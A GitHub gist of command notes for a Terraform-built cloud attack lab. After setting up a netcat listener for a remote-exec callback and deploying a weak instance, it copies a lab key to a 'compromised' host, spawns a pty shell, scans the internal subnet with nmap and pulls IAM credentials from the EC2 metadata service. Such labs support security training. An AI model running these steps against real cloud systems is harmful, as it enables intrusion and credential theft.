Last active
October 21, 2023 18:19
-
-
Save mccabe615/c5e631fa766697eaaf98020bc1ee10ba to your computer and use it in GitHub Desktop.
Terra-fied Lab 1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Setup Basic Lab | |
| #use key you generated when prompted | |
| terraform plan | |
| #use key you generated when prompted | |
| terraform apply | |
| # SSH into Lab and Setup Listener | |
| ssh ec2-user@<output IP> -i <location of your generate keys> | |
| sudo yum install nc | |
| sudo nc -lvp 80 | |
| # in new console | |
| # Launch remoteexec | |
| terraform apply -var="remoteexec_enabled=true" | |
| # review output of original console | |
| # Launch Weak Instance | |
| terraform apply -var="remoteexec_enabled=true" --var="weak_enabled=true" | |
| # Destroy when things get crazy | |
| terraform destroy -var="remoteexec_enabled=true" --var="weak_enabled=true" | |
| # Copy the private lab key to a compromised instance | |
| scp -i lab_private_key.pem ./lab_private_key.pem ec2-user@23.22.174.77:/home/ec2-user/ | |
| sudo yum install python | |
| python -c 'import pty; pty.spawn("/bin/bash");' | |
| nmap -sS 10.0.1.0/24 | |
| # SSH to pivot instance | |
| # Levarage IMDSv1 | |
| curl http://169.254.169.254/latest/meta-data/iam/info | |
| curl http://169.254.169.254/latest/meta-data/iam/security-credentials/IMDSv1ExecutionRole |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment